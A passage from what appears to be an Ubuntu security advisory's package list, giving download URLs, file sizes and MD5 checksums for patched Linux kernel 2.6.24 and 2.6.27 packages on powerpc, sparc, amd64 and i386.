http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   165040 7e0732ce30c7d287c6897fd89f0eab03
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   387144 7681e85a926a3cfd4bd1101bfe802ef0
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   350038 c70af186448028febde4ce8eb77751f7
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:  2429338 f466200ef72ff34ab3048e67e2fefa4d
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:  3471000 339b6ce1c1190471faa546011cbe67a6
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb
  Size/MD5:   650754 d55d970951a1844ed71f6e3c91709989
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb
  Size/MD5:   654978 1b04d2d2aab7846f7799a90433106d2e
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb
  Size/MD5:   650486 a9a4f052ac25ea294b6d285808c441da
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb
  Size/MD5: 20160752 f0ee78fa89e85b317dc850d8a5cd5f4c
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb
  Size/MD5: 21366650 f8c2e33729bac5cc66aade8eed5893a9
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb
  Size/MD5: 19924130 c30583206aa8506e4f8316e3519bb038
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_powerpc.deb
  Size/MD5:   695442 60d6d8281a73567a3a1859e603604f2d
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   266766 d734653d249aba57e366ae07a6b1fc93
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   307642 097f927755577ead97570034ae0f6388
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   192170 d8d4fde8fe228d72875d66dd761ed7df
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   201578 5f98ef6e232bfb91d8a91be636a154c9
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   271794 5072cd3330a816dcaa3a77f3805464e3
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   305896 4fe491fccc865c3d73ccf92bae2544b5
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:  1806898 510190e890ad1fc342fafec66b6ab616
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:  2117694 2af9aa4973ab6554eaf799abcff3e1b9
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   235192 379bf968241b634089ebbf2a3ba440e0
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   225202 4066dff0c55796f0af7809947252d479
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   170102 1a3ccf3058cab72bba610082bd9dd390
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   199686 447cab0246a933abfac18838eaac032a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   117910 9074869c8dad579b52daaafefebd100c
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   139200 06c2711f162832bcaf4141298024f18e
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    45366 e9f0bb9ae84949936a872f1a90ad4118
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    46836 05b95ec8a1a0557f8b82e1b0000e2dcc
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    51136 34dd7d7fb1c2ed5e3d1c737573fb2cd5
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    60286 99bbe8d8d2ffb39ba38190798354c608
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    74166 682080eb95c5a3820aacf3a3654e9a77
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    87206 4e21dc9fe1e1899d668fa3e0a5e15e14
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    76004 1ae6a390c94233465c10686bf504e4bc
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    30226 9649e84d3347d6ff643833bb0911f670
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:     8492 100b04ee69053cb99263a9639d1fe52e
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    10026 9b7c48978f55d3ab82a253db053175d7
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    57368 dbba71ebc8d5e9ab03a061cc143d8c6e
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    68688 9dba3901ed2ccf499412430b8ae02ffe
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   101246 290026d8946c001bd7e2f9e8d6510a6b
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   147768 ad3b8e8f8947d09aa69cbd7f9034e440
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:  1565048 4e7fd21f0fa808514fc1f84e6113e4dd
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:  1514044 2eb4cb565003a82d51c8cc36db03c6e7
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    76680 6c5817e16da05b6017c93af9ac31fe2d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    85964 45673fac64f8a6d5074a5173bfeb38e0
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    12710 25923caf1ed00118907a4e61b5df617f
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    14558 22805c8e35fa454f643f9913f2a0083d
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   449544 ff9ce90996651531510b7880de3d87fd
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   504018 c28ce7f4984fff73f65845d644d956db
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    83508 cc54fd358a4e6f5b812fefc493f53d49
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   108720 70ec0fd895b63491bc5b5e895d23e730

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    59596 e0228d1b8d48dcb9b2eeb5a133fd4fea
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    71728 1cde4a7c06765886c874a504349c7295
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    42454 dede4ea8cdb116e8865de77c903012a6
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    91760 fb38bcd0b2c03e153c25569fd6bf6f7f
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   587002 31d43eb6a4b4fba550bd644c5e3dab86
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   171008 431c1bde571792a29e2c746ac89f4069
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    22354 17062dcda3c2018f97dbc320045cff0e
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    46050 111c0d79c0bdad8a685f422383037219
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   152862 e2cc622a55df2744b07812def8c89239
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:  2121270 a2a2e37a9c05525401efaffc7ce199e7
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb
  Size/MD5:   562642 a76540180de0ac6e12dac23389ac1b3f
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb
  Size/MD5:   560822 72eb5f3fcb523dd8106850417fd0520e
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb
  Size/MD5: 14090906 2d868fdedfc320b2239dbf301790d1dc
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb
  Size/MD5: 13802896 bf6e9b86cbdede26fd89061b10296551
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_sparc.deb
  Size/MD5:   750358 2aa64567f87f3e01794a2c86529da23d
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   270052 0ba83932dbed8aeaf6ddd3a29b692a46
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   190274 e71570e211349110b3e422c4be949ad2
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   262746 5945be1dee0f68cc7c2accaf043bc050
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:  1385732 1e777b3f2817abf6b080c0716332bbd5
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   175218 97800c61086265b7ec2e905295897e5a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   122096 951902334238b51aa9b172b78962db10
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    40402 c630c56f90c33e2bd29d18af59670427
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    48062 599c33d62648436711413f7d36da2d18
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:     8700 5d3347aa29bdfac095254b435ed40d98
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    60398 53c6a79c562b197f78a7e1fdb4e77e95
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   106764 9889da01d9805293d43cab0fd63ffeec
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:  1001728 2fe7e877334ddd3cf236f6e98f5f46fe
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:     9512 be22a95339bad90349084fa441b1471f
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:   391164 43cbe127ea4d0b428ac38c360e235cb3
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb
  Size/MD5:    75858 d3fd8c3a8134018d37ddc66b7fb0711d

Updated packages for Ubuntu 8.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.diff.gz
  Size/MD5:  3181140 f341f37430b19a4815761da90e63e255
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.dsc
  Size/MD5:     1491 348bdb8051f6821a99b6e0725c2aca64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
  Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-14.35_all.deb
  Size/MD5:  3489746 1ff47091f292a7388a12f08f9dc8f8b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14_2.6.27-14.35_all.deb
  Size/MD5:  5793886 6b12bcd8a9d7fbb597c13d0aa0d285bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-14.35_all.deb
  Size/MD5: 52077688 28412f9128132c91c15915a3d5812093

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    36522 304d150ef4d9a9db9695c2ea3eddf798
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   265178 c0cedca8f9af22d7d35a6f5331e64f46
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    53460 164d97bf182cdc710089336701669026
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    43068 27182ab8ec89343ddb1acaadb79d20a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    52322 615253a966a6cfb75cde1ea2e74cdcfb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    89740 8ed1b79d7e290f7bf3cb49f50907e370
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    38172 56c5bfbb21825a4fa74292c63532e201
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   676692 265d0d3fd047797b08261901f3cb50d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   158538 b27457d63fe234182a931c857b64d242
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    46344 f4e9b955dc853195fd05ecae5f140794
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   154248 ad469c83e50590ada6c4b399a6d69854
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   312772 95e8ea1f4626ae7ced5c93597fbd8af0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:  2602274 23d7c86bd8d4ad26d754b97a428b74d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_amd64.deb
  Size/MD5:   660580 6c6df3fe5e9f36c47392b8df503fb996
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_amd64.deb
  Size/MD5:   660584 05bb6f130a1faac0e47c59a64cb59e41
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_amd64.deb
  Size/MD5: 23065618 fe985c117c3b6faee48830f64cabf971
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_amd64.deb
  Size/MD5: 23071172 a9d6617828de879a1ef4a68610f06e43
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_amd64.deb
  Size/MD5: 10464288 f91fdb8992629a5ae82cbcb2d383b8e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_amd64.deb
  Size/MD5:   673298 fe94d2d76e3a5dce812d7d8a597637a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   434636 6fe6ed3dc5c57e5a876f2c6c6c7fbb88
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   186386 338f1bad9040bf0c78ee9397de9398b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   275414 4a5d4c3690aedd96e3eee3d922d73728
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:  1809338 6afa319ea3d9f91e4d16629b86afb1b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   151300 cdf306368201a053d740b4d77bf62c02
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   194010 d7ed2a96bbd6dcfa75c163511c8b4f7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   168054 27dbc834cddb14ce830806e769efb0b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    36432 95637deca9859881af3edf3db8e06ccc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    83440 e97ed7ed724ca8c518927601f6b433b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    71986 1c4c570c1fe15e5cebad90d8a93cf70f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    23240 ebaa5d5263395e8517ea82ae3b92ddfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:     9012 f865b88210a4c54d8fdc79a9cfbdf4a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    68492 6994b7e19338405c0e127924e67e516d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   110292 8e81e11a44a41f94fef4dff4e59e3da3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:  1275410 34848383b66939762660048e268e8441
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    47594 9181c757204f49f4d0dac390e83f02a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    13480 a51476c745872d0858d9b7033a64ea9f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   393508 9500d323c74c9a330c85183c1686ff49
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:   200788 c5ed4008f970210bb982f80cbce591e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb
  Size/MD5:    13620 2fc4b4f188f9218932d0490308507835

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    33922 f40a1e72d099b64c586a6db641443044
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   244642 b720012479a1cbe6ba08d28302584fc9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    55394 90c1f139ebe83c6d6d8b1a1fc1061297
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    41218 c1b7874af183c54e95df8d57557aa7c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    48654 dfb3c0359053a662017fd9dea0f840ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    86896 3e594eaa10f4598f2c050daf5ee208e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    34058 c5f4fc9d0f61e279e0f6a9b351545b27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   675184 eac37d6873c317fec9dbc41af85ce84f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   158298 fdb6996d620940e986f9e809a1061414
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    43598 8d56f44e1e6c01610509b5cdc9ea5f42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   145120 47f331154c2773e7861a63965661123a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   301946 d7980f5869e46243a45b37625ad61afe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:  2435224 46b565365b11d793768f04f50a4c248b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_i386.deb
  Size/MD5:   643392 3e61d3633116618454601e745e24a863
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_i386.deb
  Size/MD5:   644726 37a677e1e3004e6b42d0958beeb0fda7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_i386.deb
  Size/MD5: 23478050 04856487eac811aebdd2a30416889f40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_i386.deb
  Size/MD5: 23600374 2b9a4093fbdd02dbd054cbe8ca2384f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_i386.deb
  Size/MD5: 10108412 0d4c0bd4e94cac0ea3b384b6b1d29cb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_i386.deb
  Size/MD5:   673308 dc76499e326c2f5c2e10b547241ed770
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   432904 836dfe4f7fd217c3d6b4e50ee27ff5ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   171144 e01935798941dc8722f25c9e499d7dba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   263706 ad942f31cb448980c110c5d65b4c5938
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:  1993126 9e48f8f227a345c72ae76263b3acc41e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   150922 d45e54c03e6524f7409d8ffe6ccbc1fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   183850 26ff7871dda8a29516eb04951e395500
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   157722 7cefa9c1e1abd9574daa5a2732c8d43b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    34498 a323c4253a702888a9ee866bafcac9e5
